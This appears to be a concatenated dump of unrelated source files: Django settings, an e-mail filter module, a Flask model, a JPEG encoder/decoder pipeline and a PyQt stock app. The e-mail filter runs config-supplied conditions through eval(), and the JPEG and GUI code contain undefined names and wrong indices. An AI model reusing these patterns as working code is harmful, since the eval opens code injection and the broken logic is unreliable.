# Internationalization
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/New_York'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static/Media files settings
STATIC_ROOT = "/static/"
STATIC_URL = '/static/'
MEDIA_ROOT = "/media/"
MEDIA_URL = '/media/'
# Shibboleth settings
USE_SHIBBOLETH = os.getenv("DJANGO_USE_SHIBBOLETH", default="False").lower() == "true"
SHIB_DOMAIN = os.getenv("DOMAIN", default="")
SHIB_ATTRIBUTE_MAP = {
"Shib-Identity-Provider": (True, "idp"),
"eppn": (True, "eppn"),
"givenName": (False, "givenName"),
"sn": (False, "sn")
}
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'file': {
'level': 'INFO',
'class': 'logging.FileHandler',
'filename': '/var/log/external/django.log',
'formatter': 'verbose',
},
},
'loggers': {
'django': {
'handlers': ['file'],
'level': 'WARNING',
'propagate': True,
},
'huntserver': {
'handlers': ['file'],
'level': 'INFO',
'propagate': True,
},
},
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(message)s'
},
},
}
# Email settings
CONTACT_EMAIL = 'puzzlehunt-staff@lists.andrew.cmu.edu'
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
# Environment variable overrides
if os.environ.get("ENABLE_DEBUG_EMAIL"):
EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend'
EMAIL_FILE_PATH = '/tmp/test_folder'
if os.environ.get("ENABLE_DEBUG_TOOLBAR"):
INSTALLED_APPS = INSTALLED_APPS + ('debug_toolbar',)
MIDDLEWARE = ('debug_toolbar.middleware.DebugToolbarMiddleware',) + MIDDLEWARE
if os.environ.get("SENTRY_DSN"):
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
sentry_sdk.init(
dsn=os.environ.get("SENTRY_DSN"),
integrations=[DjangoIntegration()],
# Sends which user caused the error
send_default_pii=True
)
|
999,317 | 3db2a6cc3bfb29752ac0022a10365ede8a64faa6 | """Filter that is applied on e-mail messages."""
import functools
import logging
import operator
import re
import typing as t
from .message import Message
from .connection import Connection
from .filter_actions import mark, move
_LOG = logging.getLogger(__name__)
CONDITION_OPERATORS = {
# '>': lambda arg: functools.partial(),
'=': lambda arg: functools.partial(operator.eq, arg),
# '!=': lambda a, b: a != b,
'=~': lambda arg: re.compile(arg).fullmatch,
'~<': lambda arg: functools.partialmethod(str.startswith, prefix=arg),
'~': lambda arg: functools.partial(operator.contains, b=arg),
# '~!': lambda a, b: a not in b,
'~~': lambda arg: re.compile(arg).find,
'~>': lambda arg: lambda variable: variable.endswith(arg),
}
"""Define a mapping: str -> t.Callable[[str], t.Callable[[str], bool]].
In such mapping:
- key is a 1- or 2-character string representation of a predicate on string variable; and
- value is a 1-argument function that creates another 1-argument function (a said predicate).
Every operator is meant to create and return one-argument function that applies a predicate
on its argument.
"""
ACTIONS = {
'mark': mark,
'move': move,
'copy': lambda message, imap_daemon, folder: imap_daemon.copy_message(message, folder),
'delete': None,
'reply': None,
'forward': lambda message, smtp_daemon, address: smtp_daemon.forward_message(message, address)}
"""Define a mapping: str -> t.Callable[[Message], None].
In such mapping:
- key is a string representation of an operation on Message instance; and
- value is a function which takes Message instance and possibly other arguments, and executes
said operation.
Every action is meant to create and return one-argument function that performs an operation
involving a and possibly other entities.
"""
FILTER_CODE = 'lambda message: {}'
class MessageFilter:
"""For selective actions on messages."""
@classmethod
def from_dict(cls, data: dict,
named_connections: t.Mapping[str, Connection] = {}) -> 'MessageFilter':
try:
connection_names = data['connections']
except KeyError:
connection_names = []
connections = []
for connection_name in connection_names:
connections.append(named_connections[connection_name])
condition = eval(FILTER_CODE.format(data['condition']))
try:
action_strings = data['actions']
except KeyError:
action_strings = []
actions = []
for action_string in action_strings:
_LOG.debug('parsing action: %s', action_string)
operation, _, raw_args = action_string.partition(':')
try:
action = ACTIONS[operation]
except KeyError:
_LOG.exception('action "%s" consists of invalid operation "%s"',
action_string, operation)
raise RuntimeError('cannot construct the filter with invalid action')
if action is move:
connection, _, folder = raw_args.partition('/')
args = (named_connections[connection], folder)
elif action is mark:
args = (raw_args,)
else:
raise NotImplementedError(
f'parsing args "{raw_args}" for action "{operation}" is not implemented yet')
_LOG.debug('parsed to operation %s (mapped to action %s), args: %s',
operation, action, args)
actions.append((action, args))
return cls(connections, condition, actions)
def __init__(
self, connections: t.List[Connection],
condition: t.List[t.List[t.Tuple[str, t.Callable[[str], bool]]]],
actions: t.List[t.Tuple[t.Callable[[t.Any], None], t.Sequence[t.Any]]]):
self._connections = connections
self._condition = condition
self._actions = actions
def applies_to(self, message: Message) -> bool:
try:
return self._condition(message)
except:
_LOG.exception('filter %s failed on message %s', self, message)
return False
def apply_unconditionally(self, message: Message):
"""Apply actions of this filter to the given message ignoring the conditions."""
for action, args in self._actions:
if action not in {move, mark}:
raise RuntimeError('refusing to execute untested action')
if action is mark:
args = (message._origin_server, *args)
action(message, *args)
def apply_to(self, message: Message):
"""Apply filter on the message if it satisfies the filter conditions."""
if self.applies_to(message):
self.apply_unconditionally(message)
def __str__(self):
return str({
'connections': self._connections,
'condition': self._condition,
'actions': [
'{}(message, {})'.format(action.__name__, ', '.join([str(arg) for arg in args]))
for action, args in self._actions]})
|
999,318 | 8707a4c5ba93bd364c57f5ebd6b8082f1700f772 | '''
Main Vagrant Provider class
'''
from ..provider import Provider
class VagrantProvider(Provider):
'''
Vagrant Provider
'''
def __init__(self, config):
super(VagrantProvider, self).__init__()
self.config = config
|
999,319 | 21d26fafc62882032c2245930472d2c77c92f818 | from market import db
class Item(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(length=30), nullable=False, unique=True)
price = db.Column(db.Integer, nullable=False)
barcode = db.Column(db.String(length=12), nullable=False, unique=True)
description = db.Column(db.String(length=1024), nullable=False, unique=True)
owner = db.Column(db.Integer, db.ForeignKey('user.id'))
def assign_ownership(self, user):
self.owner = user.id
user.budget -= self.price
db.session.commit()
def remove_ownership(self, user):
self.owner = None
user.budget += self.price
db.session.commit()
def __repr__(self):
return f'Item {self.name}'
|
999,320 | ac213834b2eb1526171161298a454c9dd63e59dd | #!/usr/bin/python3
"""This is module 5-base_geometry"""
class BaseGeometry:
"""empty class BaseGeometry"""
pass
|
999,321 | d2b4ec49da3c7a24272bec2153a2740c059a7b62 | import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
from Constants import *
from HuffmanDecoding import HuffmanDecoding
from HuffmanEncoding import HuffmanEncoding
from JPEGHelpers import *
import HuffmanTree
from joblib import Parallel, delayed
def step1_LoadImage(debugFlag, imagePath):
print("Step 1 Loading Image", imagePath)
img = Image.open(imagePath)
imageArray = np.array(img) # 640x480x4 array
if debugFlag:
print(imageArray.shape)
plt.imshow(imageArray)
plt.show()
return imageArray
def step2_ConvertRGBToYCbCr(debugFlag, rgbChannels):
print("Step 2 Converting to YCbCr")
height = rgbChannels.shape[0]
width = rgbChannels.shape[1]
yCbCrPicture = np.zeros((height, width, 3))
# FOR EACH RGB-PIXEL
for x in range(width):
for y in range(height):
# FLIP: R G B TO R
# G
# B
# This is surely not really needed^^
rgbVector = [
[rgbChannels[x, y, 0]], # RED-Value of the current Pixel
[rgbChannels[x, y, 1]], # BLUE-Value of the current Pixel
[rgbChannels[x, y, 2]], # GREEN-Value of the current Pixel
]
ypbpr = np.matrix(MultiplicationMatrixYCbCr) * rgbVector
ycbcr = np.matrix(ypbpr) + AdditionMatrixYCbCr
yCbCrPicture[x, y, 0] = ycbcr[0, 0] # Y
yCbCrPicture[x, y, 1] = ycbcr[1, 0] # Cb
yCbCrPicture[x, y, 2] = ycbcr[2, 0] # Cr
if debugFlag:
f, axarr = plt.subplots(1, 3)
plt.set_cmap('gray')
axarr[0].imshow(yCbCrPicture[:, :, 0])
axarr[0].set_title('For Y')
axarr[1].imshow(yCbCrPicture[:, :, 1])
axarr[1].set_title('For Cb')
axarr[2].imshow(yCbCrPicture[:, :, 2])
axarr[2].set_title('For Cr')
plt.show()
return yCbCrPicture
def step3_SubSample(debugFlag, yCbCrChannels, sampleOverX: int, sampleOverY: int):
print("Step 3 Subsample")
height = yCbCrChannels.shape[0]
width = yCbCrChannels.shape[1]
result = None
found = False
# 4 Different Modes for Sub-Sample
if sampleOverX == 1 and sampleOverY == 1:
result = Subsampling_TYPE_4_1_1(yCbCrChannels, height, width)
found = True
if sampleOverX == 2 and sampleOverY == 0:
result = Subsampling_TYPE_4_2_0(yCbCrChannels, height, width)
found = True
if sampleOverX == 2 and sampleOverY == 2:
result = Subsampling_TYPE_4_2_2(yCbCrChannels, height, width)
found = True
if sampleOverX == 4 and sampleOverY == 4:
result = Subsampling_TYPE_4_4_4(yCbCrChannels, height, width)
found = True
if found:
result = [yCbCrChannels[:, :, 0], result[:, :, 1], result[:, :, 2]]
if debugFlag:
f, axarr = plt.subplots(1, 3)
plt.set_cmap('gray')
axarr[0].imshow(result[0])
axarr[0].set_title('For Y')
axarr[1].imshow(result[1])
axarr[1].set_title('For Cb')
axarr[2].imshow(result[2])
axarr[2].set_title('For Cr')
plt.show()
return result
else:
raise ValueError("Wrong sample type")
# channelCb = np.zeros([int(height / sampleOverY), int(width / sampleOverX)])
# channelCr = np.zeros([int(height / sampleOverY), int(width / sampleOverX)])
# for x in range(0, width, sampleOverX):
# for y in range(0, height, sampleOverY):
# channelCb[int(y / sampleOverY), int(x / sampleOverX)] = arithmeticMean(yCbCrChannels, x, y, 1, sampleOverX,
# sampleOverY)
# channelCr[int(y / sampleOverY), int(x / sampleOverX)] = arithmeticMean(yCbCrChannels, x, y, 2, sampleOverX,
# sampleOverY)
# if debugFlag:
# plt.imshow(channelY)
# plt.xlabel('For Y AFTER')
# plt.set_cmap('gray')
# plt.show()
#
# plt.imshow(channelCb)
# plt.xlabel('For Cb')
# plt.set_cmap('gray')
# plt.show()
#
# plt.imshow(channelCr)
# plt.xlabel('For Cr')
# plt.set_cmap('gray')
# plt.show()
return [channelY, channelCb, channelCr]
def step4_DCTAllChannels(debugFlag, yCbCrChannels):
print("Step 4 DCT Channels")
dctY, dctCb, dctCr = Parallel(n_jobs=3)(delayed(ChannelDCT)(yCbCrChannels[i]) for i in range(3))
# dctY = ChannelDCT(yCbCrChannels[0])
# print(" DCT Channel Y")
# dctCb = ChannelDCT(yCbCrChannels[1])
# print(" DCT Channel Cb")
# dctCr = ChannelDCT(yCbCrChannels[2])
# print(" DCT Channel Cr")
if debugFlag:
f, axarr = plt.subplots(1, 3)
plt.set_cmap('gray')
axarr[0].imshow(dctY)
axarr[0].set_title('For Y')
axarr[1].imshow(dctCb)
axarr[1].set_title('For Cb')
axarr[2].imshow(dctCr)
axarr[2].set_title('For Cr')
plt.show()
return [dctY, dctCb, dctCr]
def step5_Quantization(debugFlag, yCbCrChannels):
print("Step 5a Quantization")
quantY = ChannelQuantization(yCbCrChannels[0], const.Q50, "layerY")
quantCb = ChannelQuantization(yCbCrChannels[1], const.Q50, "layerCb")
quantCr = ChannelQuantization(yCbCrChannels[2], const.Q50, "layerCr")
if debugFlag:
f, axarr = plt.subplots(1, 3)
plt.set_cmap('gray')
axarr[0].imshow(quantY)
axarr[0].set_title('For Y')
axarr[1].imshow(quantCb)
axarr[1].set_title('For Cb')
axarr[2].imshow(quantCr)
axarr[2].set_title('For Cr')
plt.show()
return [quantY, quantCb, quantCr]
def step5_DifferentalEncoding(debugFlag, yCbCrChannels):
print("Step 5b DifferentalEncoding")
dfY = ChannelDifferentialEncoding(yCbCrChannels[0])
dfCb = ChannelDifferentialEncoding(yCbCrChannels[1])
dfCr = ChannelDifferentialEncoding(yCbCrChannels[2])
if debugFlag:
f, axarr = plt.subplots(1, 3)
plt.set_cmap('gray')
axarr[0].imshow(dfY)
axarr[0].set_title('For Y')
axarr[1].imshow(dfCb)
axarr[1].set_title('For Cb')
axarr[2].imshow(dfCr)
axarr[2].set_title('For Cr')
plt.show()
return [dfY, dfCb, dfCr]
def step6_ZickZack(debugFlag, yCbCrChannels):
print("Step 6 ZickZack")
zickZackY = ChannelZickZack(yCbCrChannels[0])
zickZackCb = ChannelZickZack(yCbCrChannels[1])
zickZackCr = ChannelZickZack(yCbCrChannels[2])
if debugFlag:
f, axarr = plt.subplots(1, 3)
plt.set_cmap('gray')
axarr[0].hist(zickZackY)
axarr[0].set_title('For Y')
axarr[1].hist(zickZackCb)
axarr[1].set_title('For Cb')
axarr[2].hist(zickZackCr)
axarr[2].set_title('For Cr')
plt.show()
return [zickZackY, zickZackCb, zickZackCr]
def step7_LengthEncode(debugFlag, yCbCrChannels):
print("Step 7 LenghtEncode")
lengthEncodeY = ChannelLengthEncode(yCbCrChannels[0])
lengthEncodeCb = ChannelLengthEncode(yCbCrChannels[1])
lengthEncodeCr = ChannelLengthEncode(yCbCrChannels[2])
return [lengthEncodeY, lengthEncodeCb, lengthEncodeCr]
def step8_HuffmanEncode(debugFlag, yCbCrChannels, zicks):
print("Step 8 HuffmanEncode")
huffmanTreeAcCx = HuffmanTree(const.StdACChrominanceLengths, const.StdACChrominanceValues)
huffmanTreeDcCx = HuffmanTree(const.StdDCChrominanceLengths, const.StdDCChrominanceValues)
huffmanTreeAcY = HuffmanTree(const.StdACLuminanceLengths, const.StdACLuminanceValues)
huffmanTreeDcY = HuffmanTree(const.StdDCLuminanceLengths, const.StdDCLuminanceValues)
huffmanEncodeY = HuffmanEncoding(zicks[0], huffmanTreeAcY, huffmanTreeDcY)
huffmanEncodeCb = HuffmanEncoding(zicks[1], huffmanTreeAcCx, huffmanTreeDcCx)
huffmanEncodeCr = HuffmanEncoding(zicks[2], huffmanTreeAcCx, huffmanTreeDcCx)
return [huffmanEncodeY.result, huffmanEncodeCb.result, huffmanEncodeCr.result]
def step9_HuffmanDecode(debugFlag, yCbCrChannels, blockCount):
print("Step 9 HuffmanDecode")
huffmanTreeAcCx = HuffmanTree(const.StdACChrominanceLengths, const.StdACChrominanceValues)
huffmanTreeDcCx = HuffmanTree(const.StdDCChrominanceLengths, const.StdDCChrominanceValues)
huffmanTreeAcY = HuffmanTree(const.StdACLuminanceLengths, const.StdACLuminanceValues)
huffmanTreeDcY = HuffmanTree(const.StdDCLuminanceLengths, const.StdDCLuminanceValues)
huffmanDecoding_Y = HuffmanDecoding(yCbCrChannels[0], blockCount, huffmanTreeAcY, huffmanTreeDcY)
huffmanDecoding_Cb = HuffmanDecoding(yCbCrChannels[1], blockCount, huffmanTreeAcCx, huffmanTreeDcCx)
huffmanDecoding_Cr = HuffmanDecoding(yCbCrChannels[2], blockCount, huffmanTreeAcCx, huffmanTreeDcCx)
return [huffmanDecoding_Y.result, huffmanDecoding_Cb.result, huffmanDecoding_Cr.result]
def step10_LengthDecode(debugFlag, yCbCrChannels, blockCount):
print("Step 10 Length Decode")
runlengthDecode_Y = ChannelRunlengthDecode(yCbCrChannels[0], blockCount)
runlengthDecode_Cb = ChannelRunlengthDecode(yCbCrChannels[1], blockCount)
runlengthDecode_Cr = ChannelRunlengthDecode(yCbCrChannels[2], blockCount)
return [runlengthDecode_Y, runlengthDecode_Cb, runlengthDecode_Cr]
def step11_InverseZickZack(debugFlag, yCbCrChannels, width, height, sampledSize):
print("Step 11 Inverse ZickZack")
zickZackY = ChannelInverseZickZack(yCbCrChannels[0], width, height)
print(" Inversed Channel Y")
zickZackCb = ChannelInverseZickZack(yCbCrChannels[1], sampledSize[0], sampledSize[1])
print(" Inversed Channel Cb")
zickZackCr = ChannelInverseZickZack(yCbCrChannels[2], sampledSize[0], sampledSize[1])
print(" Inversed Channel Cr")
return [zickZackY, zickZackCb, zickZackCr]
def step12_InverseDifferentalEncding(debugFlag, yCbCrChannels):
print("Step 12 Inverse Differential")
inverseDifferentalY = ChannelInverseDifferentialEncoding(yCbCrChannels[0])
inverseDifferentalCb = ChannelInverseDifferentialEncoding(yCbCrChannels[1])
inverseDifferentalCr = ChannelInverseDifferentialEncoding(yCbCrChannels[2])
return [inverseDifferentalY, inverseDifferentalCb, inverseDifferentalCr]
def step13_Dequantization(debugFlag, yCbCrChannels):
print("Step 13 Dequantization")
dequantizationY = ChannelDequantization(yCbCrChannels[0], const.Q50, "layerY")
print(" Dequan Channel Y")
dequantizationCb = ChannelDequantization(yCbCrChannels[1], const.Q50, "layerCb")
print(" Dequan Channel Cb")
dequantizationCr = ChannelDequantization(yCbCrChannels[2], const.Q50, "layerCr")
print(" Dequan Channel Cr")
return [dequantizationY, dequantizationCb, dequantizationCr]
def step14_Idct(debugFlag, yCbCrChannels):
print("Step 14 Idct")
labels = ["layerY", "layerCb", "layerCr"]
idctY, idctCb, idctCr = Parallel(n_jobs=3)(delayed(ChannelIdct)(yCbCrChannels[i], labels[i]) for i in range(3))
# idctY = ChannelIdct(yCbCrChannels[0], "layerY")
# idctCb = ChannelIdct(yCbCrChannels[1], "layerCb")
# idctCr = ChannelIdct(yCbCrChannels[2], "layerCr")
if debugFlag:
plt.imshow(idctY)
plt.xlabel('For Y AFTER')
plt.set_cmap('gray')
plt.show()
plt.imshow(idctCb)
plt.xlabel('For Cb')
plt.set_cmap('gray')
plt.show()
plt.imshow(idctCr)
plt.xlabel('For Cr')
plt.set_cmap('gray')
plt.show()
return [idctY, idctCb, idctCr]
def step15_ReverseSubsampling(debugFlag, yCbCrChannels, sampleOverX, sampleOverY):
print("Step 15 Reverse Subsampling")
result = np.zeros((len(yCbCrChannels[0]), len(yCbCrChannels[0][0]), 3))
result[:, :, 0] = np.asarray(yCbCrChannels[0])
found = False
if sampleOverX == 1 and sampleOverY == 1:
ReverseSubsampling_TYPE_4_1_1(yCbCrChannels, result)
found = True
if sampleOverX == 2 and sampleOverY == 0:
ReverseSubsampling_TYPE_4_2_0(yCbCrChannels, result)
found = True
if sampleOverX == 2 and sampleOverY == 2:
ReverseSubsampling_TYPE_4_2_2(yCbCrChannels, result)
found = True
if sampleOverX == 4 and sampleOverY == 4:
ReverseSubsampling_TYPE_4_4_4(yCbCrChannels, result)
found = True
if found:
if debugFlag:
plt.imshow(result[:, :, 0])
plt.xlabel('ReverseSubsampling For Y')
plt.set_cmap('gray')
plt.show()
plt.imshow(result[:, :, 1])
plt.xlabel('ReverseSubsampling For Cb')
plt.set_cmap('gray')
plt.show()
plt.imshow(result[:, :, 2])
plt.xlabel('ReverseSubsampling For Cr')
plt.set_cmap('gray')
plt.show()
return result
else:
raise ValueError("Wrong sample type")
def step16_ConvertYCbCrToRGB(debugFlag, yCbCrChannels, RGBMatrix, yPbPrMatrix):
print("Step 15 Convert back to RGB")
height = len(yCbCrChannels)
width = len(yCbCrChannels[0])
rgbPicture = np.zeros((width, height, 3))
# for each YCbCr pixel
for x in range(width):
for y in range(height):
# convert YCbCr to a single vector for calculating
yCbCrVector = np.asarray([[yCbCrChannels[x, y, 0]], [yCbCrChannels[x, y, 1]], [yCbCrChannels[x, y, 2]]])
yPbPr = minus(yCbCrVector, yPbPrMatrix)
rgb = mult(RGBMatrix, yPbPr)
# map and set RGB value from vector
rgbPicture[x][y][0] = mapit(rgb[0][0]) / 255.
rgbPicture[x][y][1] = mapit(rgb[1][0]) / 255.
rgbPicture[x][y][2] = mapit(rgb[2][0]) / 255.
return rgbPicture
|
999,322 | 07ede699d51df3c547b96c9a4d8b62b229aee834 | import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from session import Session
from matplotlib.figure import Figure
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
import yfinance as yf
import datetime
from functools import partial
import matplotlib
from dnn import Dnn
import time
font = {'family' : 'Calibri',
'size' : 10,
'weight' : 'bold'}
# Colours
ORANGE = 'rgb(255, 140, 0)'
GREY = 'rgb(64, 64, 64)'
LIGHT_ORANGE = 'rgb(255, 175, 64)'
WARM_RED = 'rgb(249, 66, 58)'
LIGHT_GREY = 'rgb(200, 200, 200)'
DARK_GREY = 'rgb(32, 32, 32)'
matplotlib.rc('font', **font)
matplotlib.rc('text', color='white')
matplotlib.rc('xtick', color='white')
matplotlib.rc('ytick', color='white')
matplotlib.rc('axes', facecolor='#404040')
matplotlib.rc('axes', grid=True)
matplotlib.rc('grid', alpha=0.5, linewidth=0.4)
class MainUi(QWidget):
"""Contains all widgets."""
def __init__(self, session=Session()):
super().__init__()
self.setWindowState(Qt.WindowMaximized)
sizeObject = QDesktopWidget().screenGeometry(-1)
self.screen_height = sizeObject.height()
self.screen_width = sizeObject.width()
self.session = session
self.stack = QStackedWidget(self)
self.stack.addWidget(LoginScreen(self))
self.stack.addWidget(MainScreen(self))
self.stack.addWidget(ViewMyStocksScreen(self))
self.stack.addWidget(SignupScreen(self))
hbox = QHBoxLayout(self)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.stack)
self.setLayout(hbox)
self.setWindowTitle('Fortune')
self.stack.setCurrentIndex(0)
self.setWindowIcon(QIcon('images/logo.png'))
self.show()
def show_window(self, i, widget):
self.stack.removeWidget(self.stack.widget(i))
self.stack.insertWidget(i, widget(self))
self.stack.setCurrentIndex(i)
class LoginScreen(QWidget):
def __init__(self, master=None):
super().__init__()
self.master = master
self.session = self.master.session
self.master_layout = QHBoxLayout()
self.master_layout.setContentsMargins(0, 0, 0, 0)
self.master_container = QWidget()
self.setStyleSheet(f'background-color: {DARK_GREY}')
vlayout = QVBoxLayout()
gbox = QGroupBox()
self.layout = QFormLayout()
self.layout.setContentsMargins(0.02*self.master.screen_width, 0.05*self.master.screen_width, 0.02*self.master.screen_width, 0.05*self.master.screen_width)
self.titlebar = QLabel('FORTUNE')
self.titlebar.setStyleSheet('QLabel {background: rgb(255, 140, 0); padding: 16px; color: white}')
font = Font(30)
self.titlebar.setFont(font)
self.username_e = QLineEdit()
self.username_e.setPlaceholderText("Username")
self.username_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
self.password_e = QLineEdit()
self.password_e.setPlaceholderText("Password")
self.password_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
self.password_e.setEchoMode(QLineEdit.Password)
self.login_b = Button("LOG IN", hover_colour=LIGHT_ORANGE, hover_border=LIGHT_ORANGE)
self.login_b.clicked.connect(lambda: self.login_clicked())
self.signup_b = Button("SIGN UP", GREY, 'white', GREY, GREY, 'white', GREY)
self.signup_b.clicked.connect(lambda: self.signup_clicked())
self.layout.addRow(self.username_e)
self.layout.addRow(self.password_e)
self.layout.addRow(self.login_b)
self.layout.addRow(self.signup_b)
gbox.setLayout(self.layout)
gbox.setStyleSheet('background-color: rgb(230, 230, 230)')
vlayout.addWidget(self.titlebar)
self.login_title_frame = QHBoxLayout()
self.login_title = QLabel('WELCOME')
self.login_title.setStyleSheet('QLabel {background: rgb(255, 140, 0); padding: 16px; color: white}')
font = Font(30)
self.login_title.setFont(font)
self.login_title_frame.addWidget(self.login_title)
self.login_title_frame.setContentsMargins(0.34*self.master.screen_width, 0.15*self.master.screen_height, 0.34*self.master.screen_width, 0)
vlayout.addLayout(self.login_title_frame)
lay = QHBoxLayout()
lay.addWidget(gbox)
lay.setContentsMargins(0.34*self.master.screen_width, 0, 0.34*self.master.screen_width, 0)
vlayout.addLayout(lay)
vlayout.setContentsMargins(0, 0, 0, 0)
vlayout.addStretch(1)
vlayout.setSpacing(0)
self.master_container.setLayout(vlayout)
self.master_layout.addWidget(self.master_container)
self.setLayout(self.master_layout)
def login_clicked(self):
is_valid, self.session = self.session.dbh.check_login(self.username_e.text(), self.password_e.text(), self.session)
if is_valid:
self.master.show_window(1, MainScreen)
else:
self.error_label = QLabel('Username or password is incorrect')
self.error_label.setStyleSheet('QLabel{background-color:'+WARM_RED+'; color: white; padding: 12px}')
font = Font(12)
self.error_label.setFont(font)
self.layout.insertRow(0, self.error_label)
self.username_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white; border: 2px solid '+WARM_RED+'}')
self.password_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white; border: 2px solid '+WARM_RED+'}')
def signup_clicked(self):
self.master.show_window(4, SignupScreen)
def keyPressEvent(self, event):
if event.key() == 16777220: # Enter key - 16777220
self.login_clicked()
elif event.key() == 16777237: # Down key - 16777237
self.password_e.setFocus()
elif event.key() == 16777235: # Up Key - 16777235
self.username_e.setFocus()
class SignupScreen(QWidget):
def __init__(self, master=None):
super().__init__()
self.master = master
self.session = self.master.session
self.initui()
def initui(self):
self.main_layout = QVBoxLayout()
self.signup_form = QFormLayout()
self.signup_form.setContentsMargins(0.05*self.master.screen_width, 0.05*self.master.screen_width, 0.05*self.master.screen_width, 0.05*self.master.screen_width)
self.gbox = QGroupBox()
self.titlebar = QLabel('FORTUNE')
self.titlebar.setStyleSheet('QLabel {background: orange; padding: 16px; color: white}')
font = Font(30)
self.titlebar.setFont(font)
self.username_e = QLineEdit()
self.username_e.setPlaceholderText("Username")
self.username_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
self.password_e = QLineEdit()
self.password_e.setPlaceholderText("Password")
self.password_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
self.password_e.setEchoMode(QLineEdit.Password)
self.signup_b = Button("SIGN UP", hover_colour=LIGHT_ORANGE, hover_border=LIGHT_ORANGE)
self.signup_b.clicked.connect(lambda: self.signup_clicked())
self.signup_form.addRow(self.username_e)
self.signup_form.addRow(self.password_e)
self.signup_form.addRow(self.signup_b)
self.gbox.setLayout(self.signup_form)
self.gbox.setStyleSheet('background-color: rgb(230, 230, 230)')
self.main_layout.addWidget(self.titlebar)
self.lay = QHBoxLayout()
self.lay.addWidget(self.gbox)
self.lay.setContentsMargins(0.34*self.master.screen_width, 0.10*self.master.screen_width, 0.34*self.master.screen_width, 0)
self.main_layout.addLayout(self.lay)
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.main_layout.addStretch(1)
self.setLayout(self.main_layout)
def signup_clicked(self):
if 7 < len(self.password_e.text()) < 24:
record = [self.username_e.text(), self.password_e.text()]
is_valid = self.session.dbh.add_user_to_db(record)
if is_valid:
self.master.show_window(0, LoginScreen)
else:
self.error_label = QLabel("Username is taken")
self.error_label.setStyleSheet('QLabel{background-color:'+WARM_RED+'; color: white; padding: 12px}')
font = Font(12)
self.error_label.setFont(font)
self.signup_form.insertRow(0, self.error_label)
else:
self.error_label = QLabel('Password has to have 8-24 characters')
self.error_label.setStyleSheet('QLabel{background-color:' + WARM_RED + '; color: white; padding: 12px}')
font = Font(12)
self.error_label.setFont(font)
self.signup_form.insertRow(0, self.error_label)
self.username_e.setStyleSheet(
'QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white; border: 2px solid ' + WARM_RED + '}')
self.password_e.setStyleSheet(
'QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white; border: 2px solid ' + WARM_RED + '}')
class MainScreen(QWidget):
def __init__(self, master=None):
super().__init__()
self.master = master
self.session = self.master.session
self.initui()
def initui(self):
self.setStyleSheet(f'background-color: {DARK_GREY}')
self.main_layout = QVBoxLayout()
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.main_layout.setSpacing(0)
menu_bar = Menubar(self)
self.time_buttons_gbox = QGroupBox()
self.time_buttons_gbox.setStyleSheet('QGroupBox {background-color:'+DARK_GREY+'; border: 0px}')
self.time_buttons_layout = QHBoxLayout()
self.time_buttons_gbox.setLayout(self.time_buttons_layout)
for x in ('1M', '3M', '1Y', '5Y', 'All'):
if self.session.timeperiod == x:
style = 'QPushButton{'
style += f'color:{LIGHT_ORANGE}; background-color:{DARK_GREY}; border: 0px; padding: 16px'
style += '}'
else:
style = 'QPushButton{'
style += f'color:{LIGHT_GREY}; background-color:{DARK_GREY}; border: 0px; padding: 16px'
style += '}'
style += 'QPushButton:Hover{'
style += f'color: white'
style += '}'
font = Font(12)
time_button = QPushButton(x)
time_button.setFont(font)
time_button.setStyleSheet(style)
self.time_buttons_layout.addWidget(time_button)
time_button.clicked.connect(partial(self.view_timeframe, time=x))
menu_bar.home_b.setStyleSheet(f'color:{LIGHT_ORANGE}; background-color:{GREY}; border: 0px; padding: 10px')
self.main_layout.addWidget(menu_bar)
self.main_layout.addWidget(self.time_buttons_gbox)
self.predict_f = QHBoxLayout()
self.predict_gbox = QGroupBox()
self.predict_gbox.setStyleSheet('QGroupBox {background-color:'+DARK_GREY+'; border: 0px}')
self.predict_gbox.setLayout(self.predict_f)
self.predict_f.setContentsMargins(0.4*self.master.screen_width, 0, 0.4*self.master.screen_width, 0.05*self.master.screen_height)
self.predict_b = Button('PREDICT', hover_colour=LIGHT_ORANGE, hover_border=LIGHT_ORANGE)
self.predict_b.clicked.connect(lambda: self.predict_clicked())
self.predict_f.addWidget(self.predict_b)
# Drawing the graph.
f = Figure(figsize=(5, 5), dpi=100)
f.patch.set_facecolor('#202020')
#f.patch.set_facecolor('#ffffff')
a = f.add_subplot(111)
canvas = FigureCanvas(f)
canvas.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.main_layout.addWidget(canvas)
self.main_layout.addWidget(self.predict_gbox)
if self.session.current_stock:
if self.session.stock_change:
self.get_stock_data()
self.plot_graph(a)
canvas.draw()
self.setLayout(self.main_layout)
def get_stock_data(self):
self.session.stock_change = False
df = yf.download(self.session.stock_dict[self.session.current_stock])
self.session.current_df = df
def view_timeframe(self, time):
self.session.time_change = True
self.session.timeperiod = time
self.master.show_window(1, MainScreen)
